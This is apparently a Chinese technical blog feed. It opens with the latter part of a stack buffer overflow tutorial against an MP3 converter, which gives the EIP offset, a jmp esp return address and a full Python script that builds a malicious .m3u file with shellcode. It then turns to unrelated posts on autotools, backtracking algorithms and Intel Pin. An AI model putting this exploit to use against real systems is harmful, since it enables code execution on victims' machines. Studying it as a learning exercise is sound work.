</code></pre></div></div>
<p>创建包含5000个字符的pattern:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>!mona pattern_create 5000
</code></pre></div></div>
<p><img src="/assets/img/exploit1/2.PNG" alt="" /></p>
<p>此时pattern文件在C:\mona\RM2MP3Converter\pattern.txt,将pattern中的5000个字符替换crash.m3u中最后5000个字符。脚本如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> filename = "crash_pattern.m3u"
f = open(filename,'w')
data = 'A' * 25000
fp = open("pattern.txt",'r')
data += fp.read()
f.write(data)
f.close()
</code></pre></div></div>
<p>pattern.txt是删除了mona生成的一些信息之后的纯5000个字符文件。再次打开目标软件加载crash_pattern.m3u,看到崩溃之后的EIP如下图所示:</p>
<p><img src="/assets/img/exploit1/3.PNG" alt="" /></p>
<p>在command中输入</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>!mona pattern_offset 366a4235
</code></pre></div></div>
<p><img src="/assets/img/exploit1/4.PNG" alt="" /></p>
<p>我们看到EIP被修改的位置是25000 + 1067。</p>
<p>此时我们再用如下脚本测试一下位置是否正确:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> filename = "crash.m3u"
f = open(filename,'w')
data = 'A' * 26067 + 'B' * 4 + 'C'*100
f.write(data)
f.close()
</code></pre></div></div>
<p><img src="/assets/img/exploit1/5.PNG" alt="" /></p>
<p>我们可以看到,EIP现在是4个B,偏移正确,下面就是如何修改这个EIP</p>
<h3>3. 寻找shellcode存放的地址空间</h3>
<p>再次使用上面.m3u文件,崩溃时,打开栈的窗口</p>
<p><img src="/assets/img/exploit1/6.PNG" alt="" /></p>
<p>我们看到ESP此时为000FF730,从覆盖EIP的位置到这里还隔着3*4=12个字节。从ESP处开始存放shellcode。</p>
<h3>4. 查找jmp esp地址</h3>
<p>再次加载目标程序,Run之后Pause,在CPU窗口,右键 Search For ->All commands in All modules,在之后的窗口输入jmp esp。</p>
<p><img src="/assets/img/exploit1/7.PNG" alt="" /></p>
<p>我们选一个7C874413。</p>
<h3>5. 构造最终的输入文件</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> shellcode = ("\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
"\x40\xFF\x54\x24\x40\x57\xFF\xD0");
ret = "\x13\x44\x87\x7c";
filename = "crash.m3u"
f = open(filename,'w')
data = 'A' * 26067 + ret + '\x90' * 12 + shellcode
f.write(data)
f.close()
</code></pre></div></div>
<p><img src="/assets/img/exploit1/8.PNG" alt="" /></p>
<p>我们看到,成功利用了这个漏洞。</p>
autotool工具简介2014-01-15T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/01/15/autotool
<p>开源软件的安装一般都分三步,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./configure
make
make install
</code></pre></div></div>
<p>本文以一个例子来简单说明一下如何使用autotool工具来简化程序的编译安装。
执行./configure时,检查编译该程序所需要的条件是否存在,并且将(*.in)文件转化为最终文件(Makefile,config.h…)。当./configure成功后,就生成Makefile了。执行make之后,程序进行编译,之后使用make install进行安装。关于autotool的理论就不赘述了,网上随处都能找到,我只是简单记录一下过程。整个软件的发布如图所示:</p>
<p><img src="/assets/img/autotool/1.PNG" alt="" /></p>
<p>我们来创建一个最简单的helloworld工程,目录结构如下。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> helloworld
|
|--include
| --hello.hxx world.hxx
|
|--lib
| |--hello.cxx world.cxx
| --Makefile.am
|
|--src
| |--main.cxx
| --Makefile.am
|
|--Makefile.am
|--README, NEWS, ChangeLog, AUTHORS
</code></pre></div></div>
<ol>
<li>
<p>我们先创建如上所示的目录结构,使用脚本如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> mkdir helloworld
cd helloworld
mkdir include
cd include
touch hello.hxx world.hxx
cd ..
mkdir lib
cd lib
touch hello.cxx world.cxx Makefile.am
cd ..
mkdir src
cd src
touch main.cxx Makefile.am
cd ..
touch NEWS README ChangeLog AUTHORS Makefile.am
</code></pre></div> </div>
</li>
<li>
<p>各个文件如下内容:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //main.cxx
#include "hello.hxx"
#include "world.hxx"
#include "config.h" // make configure results available
int main()
{
hello first_word;
world second_word;
std::cout<<PACKAGE_STRING; /* use the preprocessor definitions
from config.h */
first_word.print();
second_word.print();
return 0;
}
//hello.hxx
#include <iostream>
#ifndef HELLO_HXX
#define HELLO_HXX
class hello{
public:
void print();
};
#endif
//hello.cxx
#include "hello.hxx"
void hello::print()
{
std::cout<<" Hello ";
}
</code></pre></div> </div>
</li>
</ol>
<p>world的内容跟hello一样,将hello.hxx和hello.cxx中的“hello”换成“world”即可。</p>
<ol>
<li>
<p>执行autoscan生成一个configure.scan,这是一个模板,我们将其名字改为configure.ac。修改成一下内容:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # -*- Autoconf -*-
# Process this file with autoconf to produce a configure script.
AC_PREREQ([2.68])
AC_INIT(helloworld, 0.01, liq3ea@163.com)
AM_INIT_AUTOMAKE
AC_CONFIG_SRCDIR([include/hello.hxx])
AC_CONFIG_HEADERS([config.h])
# Checks for programs.
AC_PROG_CXX
AC_PROG_RANLIB
# Checks for libraries.
# Checks for header files.
# Checks for typedefs, structures, and compiler characteristics.
# Checks for library functions.
AC_CONFIG_FILES([Makefile
lib/Makefile
src/Makefile])
AC_OUTPUT
</code></pre></div> </div>
</li>
<li>
<p>填写各个目录的Makefile.am:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> helloworld/Makefile.am:
SUBDIRS=lib src
helloworld/lib/Makefile.am:
noinst_LIBRARIES=libhw.a ## static library which is not to be installed
libhw_a_SOURCES=hello.cxx hello.hxx world.cxx world.hxx
libhw_a_CXXFLAGS=-I../include ## add path to headerfiles
helloworld/src/Makefile.am:
bin_PROGRAMS=helloworld
helloworld_SOURCES=main.cxx
helloworld_CXXFLAGS= -I../include ## add path to headerfiles
helloworld_LDADD=../lib/libhw.a ## link with static library
</code></pre></div> </div>
</li>
<li>
<p>接下来执行aclocal autoconf autoheader 命令,然后执行 automake -a 。至此所有该有的文件都有了。</p>
</li>
<li>
<p>执行./configure可以看到检查编译条件的过程,执行make编译程序,sudo make install 安装。</p>
</li>
</ol>
回溯算法及其例子2014-01-12T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/01/12/backtrack
<ul>
<li><a href="#第一节">源起</a></li>
<li><a href="#第二节">回溯简介</a></li>
<li><a href="#第三节">所有可能出栈顺序</a></li>
<li><a href="#第四节">八皇后问题</a></li>
</ul>
<h3 id="第一节">源起</h3>
<p>最近在看<a href="http://book.douban.com/subject/10432347/">《算法》</a>,其中有一个题是很老的问题,0~9入栈顺序一定,问哪些出栈顺序是不可能的。如0,1,2,…,7,8,9肯定是可以的,9,8,7,…3,2,1也可以,8,2,3,…就不可以。
这个问题本身是比较简单的,这个问题引出的问题就是求出所有可能的出栈顺序,主要是借此机会复习一下回溯法。</p>
<p>先来就题论题。解题的关键还是模拟出入栈,比如要判断的例子是4,3,2,1,0,9,8,7,6,5。我们先看到第一个出的是4,必然0,1,2,3已经依次压栈了。</p>
<ol>
<li>
<p>我们首先建立一个空栈s,还有一个指向输入序列的下标index(input[index]是下一个期望出栈的元素),以及即将入栈的元素in,index和in的初始值显然是0,input表示输入的序列;</p>
</li>
<li>
<p>当in不等于input[index]时,我们将in入栈,in再加1,直到其等于input[index];</p>
</li>
<li>
<p>in++,index++;这表示4已经顺利出栈;</p>
</li>
<li>
<p>然后比较s.peek()跟input[index]的值,如果不同,继续循环入栈,相同则出栈;</p>
</li>
</ol>
<p>对照例子我们人肉走一遍程序:</p>
<ol>
<li>
<p>in=0,input[0]=4,将0,1,2,3入栈s;</p>
</li>
<li>
<p>in=4时,in=input[0],接着in=5,index=1;</p>
</li>
<li>
<p>栈顶3与序列中input[index]相等,index=2;一直到0都相等;此时,index=5,in=5,栈s为空;</p>
</li>
<li>
<p>5小于9,将5,6,7,8入栈;</p>
</li>
</ol>
<p>剩下的跟1~3步类似了。</p>
<p>代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import java.util.Stack;  // StdIn/StdOut 来自《算法》一书配套的 algs4 库
public class StackSeq
{
    public static boolean isOk(int[] input, int n)
    {
        int index = 0;
        int in = 0;
        Stack<Integer> s = new Stack<Integer>();
        while (true)
        {
            if (index >= n - 1)
                return true;
            if (in >= n)
                return false;
            if (in != input[index])
            {
                s.push(in);
                ++in;
                continue;
            }
            ++in;
            ++index;
            // 注意加上 index < n 的判断,防止整个序列匹配完后越界访问 input
            while (!s.isEmpty() && index < n && s.peek() == input[index])
            {
                ++index;
                s.pop();
            }
        }
    }
    public static void main(String[] args)
    {
        StdOut.println("input the number of arrays:");
        int n = StdIn.readInt();
        int[] input = new int[n];
        while (true)
        {
            for (int i = 0; i < n; ++i)
            {
                input[i] = StdIn.readInt();
            }
            boolean ret = isOk(input, n);
            if (ret == true)
            {
                StdOut.println("the sequence is ok!");
            }
            else
                StdOut.println("the sequence is not ok!");
        }
    }
}
</code></pre></div></div>
<p>原谅我那蹩脚的java。</p>
<h3 id="第二节">回溯简介</h3>
<p>知道了如何判断一个序列是否是正确的出栈序列,我们自然会想到求出所有的正确出栈序列。这也是本文的主题,回溯算法。回溯算法的思想还是比较简单,我在百度百科摘了一段如下:</p>
<p>从一条路往前走,能进则进,不能进则退回来,换一条路再试。八皇后问题就是回溯算法的典型,第一步按照顺序放一个皇后,然后第二步符合要求放第2个皇后,如果没有符合条件的位置符合要求,那么就要改变第一个皇后的位置,重新放第2个皇后的位置,直到找到符合条件的位置就可以了。回溯在迷宫搜索中使用很常见,就是这条路走不通,然后返回前一个路口,继续下一条路。回溯算法说白了就是穷举法。不过回溯算法使用剪枝函数,剪去一些不可能到达 最终状态(即答案状态)的节点,从而减少状态空间树节点的生成。回溯法是一个既带有系统性又带有跳跃性的的搜索算法。它在包含问题的所有解的解空间树中,按照深度优先的策略,从根结点出发搜索解空间树。算法搜索至解空间树的任一结点时,总是先判断该结点是否肯定不包含问题的解。如果肯定不包含,则跳过对以该结点为根的子树的系统搜索,逐层向其祖先结点回溯。否则,进入该子树,继续按深度优先的策略进行搜索。回溯法在用来求问题的所有解时,要回溯到根,且根结点的所有子树都已被搜索遍才结束。而回溯法在用来求问题的任一解时,只要搜索到问题的一个解就可以结束。这种以深度优先的方式系统地搜索问题的解的算法称为回溯法,它适用于解一些组合数较大的问题。</p>
<p>我在网上找到了<a href="http://www.csie.ntnu.edu.tw/~u91029/Backtracking.html#1">这里</a>有一个比较好的说明。这里我们用求1,2,3…n这n个数里面m个数的排列(对应下面代码中的C(n,m))来简要介绍一下回溯算法。在上面的链接中偷了一张图</p>
<p><img src="/assets/img/backtrack/1.png" alt="" /></p>
<p>也就是第一步的时候我们选择1——n中一个数,比如选了1,然后再在剩下的n-1个数中求出其排列,完了,我们再回溯到第一步,选择2,之后的依此类推。为了不产生重复的数字,我们在进行下一步的前进之前进行了判断。代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
using namespace std;
int count = 0;
void print(int* a, int m)
{
    for (int k = 0; k < m; ++k)
    {
        cout << a[k] << " ";
    }
    cout << endl;
}
void tuple(int* a, int i, int m, int n)
{
    if (i == m)
    {
        print(a, m);
        count++;
        return;
    }
    for (int k = 1; k <= n; ++k)
    {
        for (int h = 0; h < i; ++h)
        {
            if (a[h] == k)
            {
                goto LOOP;
            }
        }
        a[i] = k;
        tuple(a, i + 1, m, n);
LOOP:
        continue;
    }
}
int main()
{
    int a[1000];
    int n, m;
    cout << "input C(n,m) :\n";
    cin >> n >> m;
    cout << "(" << n << "," << m << ")排列数" << endl;
    tuple(a, 0, m, n);
}
</code></pre></div></div>
<p>根据这段代码求组合数跟全排列也很简单了。总结一下使用递归解回溯,递归函数第一部分判断递归终止条件,然后是递归进入下一个维度,之后回溯。</p>
<h3 id="第三节">所有可能出栈顺序</h3>
<p>我们来看看这个问题如何使用回溯法。</p>
<p>关键的点就在,“一个元素i入栈之后,我们面临两种选择,i出栈,或者i+1入栈”,这就有了回溯的基础。而问题的终点就是有了N个元素之后。递归函数就应该这样设计</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>public static void printiter(int n,int cur,Stack<Integer> tmp,Vector<Integer> out)
</code></pre></div></div>
<p>n是元素个数,解的维度,cur表示当前的维度,tmp表示2中选择中的进栈,out存放的出栈的元素。终止条件显然是out的元素个数是n。得源码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>public static void printiter(int n, int cur, Stack<Integer> tmp, Vector<Integer> out)
{
    if (n == out.size())
    {
        for (int i : out)
        {
            StdOut.print(i + " ");
        }
        StdOut.println("");
        count++;
        return;
    }
    if (cur != n) // 入栈
    {
        tmp.push(cur);
        printiter(n, cur + 1, tmp, out);
        tmp.pop();
    }
    if (!tmp.isEmpty())
    {
        int x = tmp.pop();
        out.add(x);
        printiter(n, cur, tmp, out);
        out.remove(out.size() - 1);
        tmp.push(x);
    }
}
</code></pre></div></div>
<h3 id="第四节">八皇后问题</h3>
<p>借这个机会再来说说八皇后这个老问题。8*8的棋盘上放8个皇后,使得任意两个皇后都不能相互攻击。我们一步一步用上面的思路来解决这个问题。容易想到使用</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bool solution[8][8]
</code></pre></div></div>
<p>来表示每个位置是否放皇后,如果为false则不放,true就放皇后。我们首先可以得出如下的结构,能够将所有的可能计算出来。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
using namespace std;
#define N 8
bool solution[N][N] = {false};
void print_solution()
{
    for (int i = 0; i < N; ++i)
    {
        for (int j = 0; j < N; ++j)
        {
            cout << solution[i][j] << " ";
        }
        cout << endl;
    }
    cout << "\n\n\n";
}
void QueenIter(int x, int y)
{
    if (y == N)
    {
        x++;
        y = 0;
    }
    if (x == N)
    {
        print_solution();
        return;
    }
    solution[x][y] = true;
    QueenIter(x, y + 1);
    solution[x][y] = false;
    QueenIter(x, y + 1);
}
int main()
{
    QueenIter(0, 0);
}
</code></pre></div></div>
<p>看出结构也是首先判断是否终止,然后遍历该维度能取得所有值,进入下一个维度。(该例输出太大,若要跑程序,建议将N改成4)</p>
<p>下面的步骤是排除所有不可能的解,很明显只有当要放皇后的时候才需要判断。</p>
<p>我们建立4个bool数组,数组中的每个元素记录这个位置还能否放皇后。为了使得皇后的个数为8,我们还需要增加一个参数c,只有c等于8时,我们才输出方案。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void QueenIter(int x, int y, int c)
{
    if (y == N)
    {
        x++;
        y = 0;
    }
    if (x == N)
    {
        if (c == N)
        {
            print_solution();
        }
        return;
    }
    int d1 = (x + y) % 15;
    int d2 = (x - y + 15) % 15;
    if (!mx[x] && !my[y] && !md1[d1] && !md2[d2])
    {
        mx[x] = my[y] = md1[d1] = md2[d2] = true;
        solution[x][y] = true;
        QueenIter(x, y + 1, c + 1);
        mx[x] = my[y] = md1[d1] = md2[d2] = false;
    }
    solution[x][y] = false;
    QueenIter(x, y + 1, c);
}
</code></pre></div></div>
<p>由于一行只能放置1个皇后,可以改进一下,改进后如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
using namespace std;
#define N 8
int solution[N] = {0};
bool my[8], md1[15], md2[15];
int count = 0;
void print_solution()
{
    for (int i = 0; i < N; ++i)
    {
        for (int j = 0; j < solution[i]; ++j)
        {
            cout << 0 << " ";
        }
        cout << 1 << " ";
        for (int j = solution[i] + 1; j < N; ++j)
        {
            cout << 0 << " ";
        }
        cout << endl;
    }
    cout << "\n\n\n";
}
void Queen(int x)
{
    if (x == 8)
    {
        print_solution();
        count++;
        return;
    }
    for (int i = 0; i < N; ++i)
    {
        int d1 = (x + i) % 15;
        int d2 = (x - i + 15) % 15;
        if (!my[i] && !md1[d1] && !md2[d2])
        {
            my[i] = md1[d1] = md2[d2] = true;
            solution[x] = i;
            Queen(x + 1);
            my[i] = md1[d1] = md2[d2] = false;
        }
    }
}
int main()
{
    Queen(0);
    cout << count << endl;
}
</code></pre></div></div>
Intel Pin简介2014-01-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/01/02/intro-to-pin
<h3>1. Intel Pin简介</h3>
<p>Pin是Intel公司开发的动态二进制插桩框架,可以用于创建动态程序分析工具,支持IA-32和x86-64指令集架构,支持windows和linux。</p>
<p>简单说就是Pin可以监控程序的每一步执行,提供了丰富的API,可以在二进制程序运行过程中插入各种函数,比如统计一个程序执行了多少条指令、每条指令的地址等信息。显然,这样完全掌握了程序之后是可以做很多事的,比如检测程序的内存使用、评估程序的性能。实际上我是在很多介绍Taint分析的文章中知道Pin的,我也准备对Pin写一个系列的文章。</p>
<h3>2. PinTools的编译</h3>
<p>本节简单叙述一下PinTools在windows下的编译</p>
<p>1.<a href="http://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool">Pin官网</a>按照VS的版本选择对应的Pin版本</p>
<p>2.安装<a href="http://www.cygwin.com/">Cygwin</a>,记得选择安装make工具</p>
<p>3.安装好Cygwin之后,将Cygwin目录下面的bin目录添加到环境变量Path中</p>
<p>4.通过VS的命令行进入pin/source/tools/ManualExamples目录下,使用make命令即可编译ManualExamples下的例子,也可以在tools目录下编译所有PinTools,windows下生成的文件一般都是dll。</p>
<h3>3. 使用示例</h3>
<p>在cmd下运行命令(test.exe是自己随便写的helloworld程序,itrace.dll就是第2节中编译出来的ManualExamples/obj-ia32下面的dll)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pin -t itrace.dll -- test.exe
</code></pre></div></div>
<p>运行后会在当前文件夹下生成一个itrace.out文件,里面记录的就是每条被执行指令的地址。与OD里的反汇编结果对比可以看到,Pin并不是从二进制映像文件的第一条指令开始记录,而是从进程实际执行的指令开始(似乎也不是第一条),也就是从ntdll里的线程启动函数开始的。</p>
<h3>4. Pin深入</h3>
<p>本部分翻译自<a href="http://software.intel.com/sites/landingpage/pintool/docs/62141/Pin/html/index.html#INSTRUMENTING">Pin文档</a>,肯定有不少问题,欢迎指正。</p>
<h4>Pin</h4>
<p>认识Pin的最好方法是认为它是一个JIT编译器。这个编译器的输入不是字节码而是普通的可执行文件。Pin截获这个可执行文件的第一条指令,产生新的代码序列。接着将控制流程转移到这个产生的序列。产生的序列基本上跟原来的序列是一样的,但是Pin保证在一个分支结束后重新获得控制权。重新获得控制权之后,Pin为分支的目标产生代码并且执行。Pin通过将所有产生的代码放在内存中,以便于重新使用这些代码并且可以直接从一个分支跳到另一个分支,这提高了效率。</p>
<p>在JIT模式,执行的代码都是Pin生成的代码。原始代码仅仅是用来参考。当生成代码时,Pin给用户提供了插入自己代码的机会(插桩)。</p>
<p>Pin插入的桩代码都会被实际执行,不论它们位于何处。当然也有少数例外,比如条件分支:如果一条指令从未被执行到,就不会为它插入分析调用。</p>
<h4>Pintools</h4>
<p>概念上说,插桩包括两个组件:</p>
<ul>
<li>决定在哪里插入什么代码的机制</li>
<li>插入点执行的代码</li>
</ul>
<p>这两个组件就是<strong>桩</strong>和<strong>分析</strong>
代码。两个组件都在一个单独的可执行体中,即<strong>Pintool</strong>。Pintool可以认为是Pin中的插件,它能够修改生成代码的流程。</p>
<p>Pintool注册一些桩回调函数在Pin中,每当Pin生成新的代码时就调用回调函数。这些回调函数代表了桩组件。它可以检查将要生成的代码,得到它的静态属性,并且决定是否需要以及在哪里插入调用来分析函数。</p>
<p>分析函数收集关于程序的数据。Pin保证整数和浮点指针寄存器的状态在必要时会被保存和回复,允许传递参数给(分析)函数。</p>
<p>Pintool也可以注册一些事件通知回调,比如线程创建和fork,这些回调大体上用于数据收集或者初始化与清理。</p>
<h4>Observations</h4>
<p>由于Pintool类似插件一样工作,所以它必须处于Pin与被插桩的可执行文件的地址空间。这样,Pintool就能够访问可执行文件的所有数据。它也跟可执行文件共享文件描述符与进程其他信息。</p>
<p>Pin和Pintool从第一条指令控制程序。对于与共享库一起编译的可执行文件,这意味着动态加载器和共享库将会对Pintool可见。</p>
<p>当编写tools时,最重要的是调整分析代码而不是桩代码。因为桩代码执行一次,而分析代码执行许多次。</p>
<h4>Instrumentation Granularity</h4>
<p>如上所述,Pin的插桩是实时的。插桩发生在一段代码序列执行之前。我们把这种模式叫做踪迹插桩(trace instrumentation)。</p>
<p>踪迹插桩让Pintool在可执行代码每一次执行时都能进行监视和插装。trace通常开始于选中的分支目标并结束于一个条件分支,包括调用(call)和返回(return)。Pin能够保证trace只在最上层有一个入口,但是可以有很多出口。如果在一个trace中发生分支,Pin从分支目标开始构造一个新的trace。Pin根据基本块(BBL)分割trace。一个基本块是一个有唯一入口和出口的指令序列。基本块中的分支会开始一个新的trace也即一个新的基本块。通常为每个基本块而不是每条指令插入一个分析调用。减少分析调用的次数可以提高插装的效率。trace插装利用了TRACE_AddInstrumentFunction API call。</p>
<p>注意,虽然Pin从程序执行中动态发现执行流,Pin的BBL与编译原理中的BBL定义不同。如,考虑生成下面的switch statement:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>switch(i)
{
case 4: total++;
case 3: total++;
case 2: total++;
case 1: total++;
case 0:
default: break;
}
</code></pre></div></div>
<p>它将会产生如下的指令(在IA-32架构上)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.L7:
addl $1, -4(%ebp)
.L6:
addl $1, -4(%ebp)
.L5:
addl $1, -4(%ebp)
.L4:
addl $1, -4(%ebp)
</code></pre></div></div>
<p>在经典的基本块定义中,每一条addl指令都会自成一个单指令基本块。但是Pin会按进入点动态生成BBL:从.L7进入时生成包含4条指令的BBL,从.L6进入时生成包含3条指令的BBL,依此类推。这就是说Pin统计的BBL个数会跟书上定义的基本块数不一样。例如,当代码分支到.L7时,Pin只记录1个BBL,但按经典定义有4个基本块被执行。</p>
<p>Pin也会在某些指令处截断BBL,比如cpuid、popf和带rep前缀的指令。因为rep前缀指令被当作隐式的循环,如果一条rep前缀指令循环不止一次,从第二次迭代开始会产生一个单指令的BBL,所以这种情形会产生比你预期更多的基本块。</p>
<p>为了方便编写Pintool,Pin还提供了指令插桩模式(instruction instrumentation),让工具可以监视和插装每一条指令。本质上这两种模式是一样的,只是编写Pintool时不需要再自行遍历trace中的每条指令。与trace插桩模式一样,特定的基本块和指令可能会被生成很多次。指令插桩用到了INS_AddInstrumentFunction API call。</p>
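<p>本文开头运行的itrace.dll正是用指令插桩模式写成的。下面是Pin自带的ManualExamples中itrace工具的简化版(依赖Pin kit提供的pin.H,不能脱离Pin单独编译运行,这里仅作示意),它在每条指令执行前插入一个分析调用,把指令地址写入itrace.out:</p>

```cpp
#include <stdio.h>
#include "pin.H"   // 由Pin kit提供

FILE *trace;

// 分析函数:每条指令执行前被调用,记录指令地址
VOID printip(VOID *ip) { fprintf(trace, "%p\n", ip); }

// 桩函数:Pin每遇到一条新指令时调用一次,决定插入什么分析调用
VOID Instruction(INS ins, VOID *v)
{
    INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)printip,
                   IARG_INST_PTR, IARG_END);
}

VOID Fini(INT32 code, VOID *v) { fclose(trace); }

int main(int argc, char *argv[])
{
    trace = fopen("itrace.out", "w");
    if (PIN_Init(argc, argv)) return 1;
    INS_AddInstrumentFunction(Instruction, 0);
    PIN_AddFiniFunction(Fini, 0);
    PIN_StartProgram();   // 不会返回
    return 0;
}
```

<p>可以看到桩函数(Instruction)在Pin生成代码时只执行一次,而分析函数(printip)每条指令执行时都会被调用,这也印证了上文所说:应当重点优化分析代码而不是桩代码。</p>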
<p>有时,以比trace更大的粒度进行插桩更有用。Pin为此提供了两种模式:镜像(image)插桩和函数(routine)插桩。这两种模式通过缓存插桩请求来实现,因此需要额外的空间,也称作提前(ahead-of-time)插桩。</p>
<p>镜像插装让Pintool在IMG第一次加载的时候对整个image进行监视和插装。Pintool的处理范围可以是镜像中的每个块(section,SEC),块中的每个函数(routine,RTN),函数中的每条指令(instruction,INS)。插桩代码可以插入到一个函数或一条指令执行之前或之后。镜像插装用到了IMG_AddInstrumentFunction API call。镜像插装依靠符号信息判断函数的边界,因此需要在PIN_Init之前调用PIN_InitSymbols。</p>
<p>函数插装让Pintool在一个函数第一次被调用之前监视和插装整个函数。Pintool的处理范围可以是函数里的每条指令,但这里没有足够的信息把指令归并成基本块。插桩代码可以插入到一个函数或一条指令执行之前或之后。函数插桩使Pintool的作者不必像镜像插桩那样逐个遍历各个section,更加方便。</p>
<p>函数插装用到了RTN_AddInstrumentFunction API call。插入在函数返回处的插桩不一定能可靠地工作,因为当函数以一个调用结尾时,无法判断它何时真正返回。</p>
<p>注意在镜像插桩和函数插桩中,无法预知一个函数是否会被执行(因为这些插桩发生在镜像被载入时)。在trace插桩和指令插桩中,只有被执行的代码才会被遍历。</p>
<h4>Managed platforms support</h4>
<p>Pin支持所有可执行文件,包括托管(managed)的二进制文件。从Pin的角度来看,托管文件是一种自修改程序。有一种机制可以让Pin区分即时编译的代码(Jitted代码)和其他动态生成的代码,并将Jitted代码与相应的托管函数关联起来。为了支持这个功能,托管平台的JIT编译器必须支持Jit Profiling API。</p>
<p>必须支持下面的功能:</p>
<ul>
<li>RTN_IsDynamic() API用来识别动态生成的代码。一个函数必须被Jit Profiling API标记为动态生成的。</li>
<li>一个Pin tool可以使用RTN_AddInstrumentFunction API加入Jitted函数</li>
</ul>
<p>为了支持托管平台,以下条件必须满足:</p>
<ul>
<li>
<p>设置INTEL_JIT_PROFILER32和INTEL_JIT_PROFILER64环境变量,使其指向pinjitprofiling动态库</p>
<ol>
<li>
<p>For Windows</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> set INTEL_JIT_PROFILER32=<The Pin kit full path>\ia32\bin\pinjitprofiling.dll
set INTEL_JIT_PROFILER64=<The Pin kit full path>\intel64\bin\pinjitprofiling.dll
</code></pre></div> </div>
</li>
<li>
<p>For Linux</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> setenv INTEL_JIT_PROFILER32 <The Pin kit full path>/ia32/bin/libpinjitprofiling.so
setenv INTEL_JIT_PROFILER64 <The Pin kit full path>/intel64/bin/libpinjitprofiling.so
</code></pre></div> </div>
</li>
</ol>
</li>
<li>
<p>在Pin命令行为Pin tool加入knob support_jit_api选项</p>
</li>
</ul>
<h4>Symbols</h4>
<p>Pin利用符号对象(SYM)提供了对函数名字的访问。符号对象仅提供程序中函数的符号信息,其他类型的符号(如数据符号)需要tool自行获取。</p>
<p>在Windows上,可以通过dbghelp.dll实现这个功能。注意在桩函数中使用dbghelp.dll并不安全,可能会导致死锁。一个可能的解决方案是通过一个不同的未被插桩的进程得到符号。</p>
<p>在Linux上,libelf.so或者libdwarf.so可以用来获取符号信息。</p>
<p>为了通过名字访问函数必须先调用PIN_InitSymbols。</p>
<h4>Floating Point Support in Analysis Routines</h4>
<p>Pin在执行各种分析函数时保持着程序的浮点状态。</p>
<p>IARG_REG_VALUE不能用来把浮点寄存器作为参数传给分析函数。</p>
<h4>Instrumenting Multi-threaded Applications</h4>
<p>给多线程程序插桩时,如果多个合作线程会访问全局数据,必须保证tool是线程安全的。Pin试图为tool提供传统C++程序的环境,但是Pintool不能使用标准的线程库:Linux tool不能使用pthread,Windows tool不能使用Win32 API管理线程。作为替代,应该使用Pin提供的锁和线程管理API。</p>
